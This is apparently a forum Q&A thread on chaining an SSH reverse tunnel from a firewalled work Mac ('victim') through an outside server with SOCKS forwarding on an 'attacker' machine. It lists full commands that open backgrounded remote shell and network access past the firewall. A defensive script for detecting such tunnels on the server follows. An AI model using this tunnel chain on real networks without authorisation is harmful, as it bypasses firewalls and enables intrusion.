
My situation is as follows:

  • Work Mac behind a firewall, named 'victim'. (High Sierra 10.13.3)
  • Ubuntu VPS on the net, named 'server', which has ssh running on port 2222. (Ubuntu 16.04)
  • Other Mac, also behind a firewall, named 'attacker'. (High Sierra 10.13.3)

I want to use socks to visit internal websites only accessible from 'victim'.

When I do ssh -R 5555:localhost:22 [email protected] -P 2222 from 'victim' and ssh into 'server' from attacker and run ssh victim@localhost -p 5555, I have shell access from attacker into the victim.

What I need to achieve is to use socks to visit websites only accessible from the 'victim'.

I understand I should set up a reverse tunnel from the victim to the server, set up some forward on the server from the incoming port to the reverse connection port, and also set up forwarding on the attacker from localhost to remote (which connects to the server), but how do I do this?

When I set up socks directly from attacker to server I just run ssh -D 8080 [email protected] -p 2222 and set up a socks v5 proxy localhost:8080 in Firefox, but I don't get how I put up the forward on the server...

Anyone who can explain it to me? Thx

1 Answer

Apparently nobody can answer this question, that's okay because I found the answer myself.

Here are the answers:

  • On victim: ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On attacker #1: ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On attacker #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On attacker #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333

Every application you set up to use host localhost with port 3333 will be tunneled via serv to the victim, and when you visit something like http://myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the attacker (if you set up socks settings for the specific app or for the system as a whole), which will be tunneled via serv to victim, and you'll act as the victim as such.

The mistake I made in my thought process was that I didn't really understand what the reverse port scheme looks like; I will try to explain it in simple terms.

Victim action

ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • -N = I'm not going to run commands in the shell
  • -f = put the process in the background (so you can close the terminal window)
  • -R = reverse tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to forward data to port 22 on victim. If you've set up victim to have ssh run on port 2222 you should change 22 to 2222.
  • -p = port on which ssh on serv is running.

1st attack action

ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>

The 1st command you make on attacker (-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right through to victim. (This is just for dynamic port forwarding / socks applications.)

If you just want to have shell access on victim, instead of this command you just ssh into serv & then run the command: 'ssh user_on_victim@localhost -p 5555'.

But we don't want shell access, we want to tunnel all data dynamically so we have to make a port-forward.

Or the schematic explanation

  • -L = local port-forwarding (on serv)
  • 4444:localhost:5555 = put all data coming in on port 4444 to port 5555.

2nd attack action

The 2nd command you make on attacker

ssh -p 4444 -D localhost:3333 user_on_victim@localhost

is the actual command that's going to initialise the connection through the 2 tunnels. What you do is you say: connect to port 4444 and put all the data that's coming in on (localhost port 3333) to 4444 (which will be put through locally on serv to port 5555 -> which will be pushed out to port 22 on victim).

Or the schematic explanation

  • -D = Dynamic forwarding
  • localhost:3333 = listen on port 3333 and push data through the ssh connection to port 4444 on serv.
  • -p 4444 = the port on which serv is listening to forward the data to port 5555 and then out to port 22 on victim.

3rd attack action

Set up your applications or even your entire system to use a SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)

The 3rd action on attacker is the actual data you're going to tunnel to victim. It does not matter what data or application this is, that's why it's dynamic forwarding; it does not matter on which ports these applications run because that will be handled by SOCKS.

I hope someone finds use in my explanation.

Have a nice day....

  • Awesome! Be sure to mark this answer as solving your problem, so others will know that it works for you.
    – jpaugh
    Commented Feb 1, 2018 at 23:29
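The answer above explains that `ssh -R 5555:localhost:22` makes sshd on serv open a listener on 127.0.0.1:5555, and that everything else in the chain hangs off that listener. The script below is an added example (not code from the question or answer) written from the server administrator's side: it shows what such a tunnel looks like from serv and which sshd_config directive governs whether sshd will create it at all. Both functions are my own; the `ss -tlnp` output and the sshd_config fragment they parse are constructed sample data, and the `users:(("sshd",pid=...))` column format is the one iproute2's `ss -p` prints.

```shell
#!/bin/sh
# Added example, not part of the original post.
#  find_sshd_forward_listeners: reads `ss -tlnp` output on stdin and prints every
#    LISTEN socket owned by sshd that is not the real service port ($1). A
#    loopback listener such as 127.0.0.1:5555 owned by sshd is exactly what a
#    client's `ssh -R 5555:localhost:22` creates on the server.
#  tcp_forwarding_policy: reads an sshd_config on stdin and prints the global
#    AllowTcpForwarding value; OpenSSH defaults it to "yes" when the directive
#    is absent, so -R/-L/-D are allowed unless an admin turns it off.

# Constructed `ss -tlnp` sample: sshd serves on 2222, one reverse-tunnel
# listener on 5555, and an unrelated mysqld listener.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:2222       0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    127.0.0.1:5555     0.0.0.0:*         users:(("sshd",pid=4410,fd=9))
LISTEN 0      128    127.0.0.1:3306     0.0.0.0:*         users:(("mysqld",pid=950,fd=20))
LISTEN 0      128    [::]:2222          [::]:*            users:(("sshd",pid=812,fd=4))'

# Constructed sshd_config sample: the directive is only present commented out.
SAMPLE_SSHD_CONFIG='# constructed sshd_config fragment
Port 2222
PermitRootLogin no
# AllowTcpForwarding yes   (commented out, so the default "yes" applies)
Match User backup
    AllowTcpForwarding no'

# $1 = port sshd is configured to serve on; stdin = `ss -tlnp` output.
# Output: "<local-address:port> pid=<pid>" per extra sshd listener.
find_sshd_forward_listeners() {
    awk -v svc="$1" '
        $1 == "LISTEN" && index($NF, "\"sshd\"") > 0 {
            n = split($4, a, ":"); port = a[n]      # last field after ":" works for [::]:port too
            if (port != svc) {
                match($NF, /pid=[0-9]+/)
                print $4 " " substr($NF, RSTART, RLENGTH)
            }
        }'
}

# stdin = sshd_config. Prints the global AllowTcpForwarding value, "yes" when
# unset. Everything after the first Match line is conditional, so it is skipped.
tcp_forwarding_policy() {
    awk '
        tolower($1) == "match" { in_match = 1 }
        !in_match && tolower($1) == "allowtcpforwarding" { val = tolower($2) }
        END { print (val == "" ? "yes" : val) }'
}

# Stand-alone usage over the constructed samples; on a real server replace the
# printf with `ss -tlnp` (run as root so process names are visible) and
# `cat /etc/ssh/sshd_config`.
printf '%s\n' "$SAMPLE_SS" | find_sshd_forward_listeners 2222
printf '%s\n' "$SAMPLE_SSHD_CONFIG" | tcp_forwarding_policy
```

Seeing sshd own a loopback listener other than its service port is the tell-tale sign of an active reverse forward on serv; if a server should never act as a relay, `AllowTcpForwarding no` in the global section of sshd_config stops sshd from creating the 5555 listener in the first place (the answer's `-R`, `-L` and `-D` all depend on it).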
